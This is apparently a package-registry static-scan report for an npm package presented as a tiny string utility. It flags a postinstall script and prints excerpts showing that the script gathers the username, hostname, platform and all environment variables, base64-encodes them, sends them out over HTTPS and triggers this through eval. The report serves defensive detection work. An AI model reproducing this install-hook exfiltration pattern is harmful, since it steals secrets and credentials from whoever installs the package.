registry  /  @nsub/nitxe  /  1.0.1

@nsub/nitxe@1.0.1

A tiny string utility library

Static Scan Results

scanned 4h ago · by rust-scanner

Static analysis flagged 7 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
EnvironmentVarsEvalNetwork
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 770 B of source

Source & flagged code

4 flagged · loading source
package.jsonView file
scripts.postinstall = node ./scripts/postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node ./scripts/postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
scripts/postinstall.jsView file
2L3: const https = require('https'); L4: ... L6: return { L7: user: os.userInfo().username, L8: host: os.hostname(), L9: platform: process.platform, L10: env: process.env, L11: }; ... L14: function play(data) { L15: const encoded = Buffer.from(JSON.stringify(data)).toString('base64'); L16: const req = https.request({
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

scripts/postinstall.jsView on unpkg · L2
25try { L26: eval('play(food())'); L27: } catch (e) {
Low
Eval

Package source references a known benign dynamic code generation pattern.

scripts/postinstall.jsView on unpkg · L25

Findings

2 High3 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationscripts/postinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowEvalscripts/postinstall.js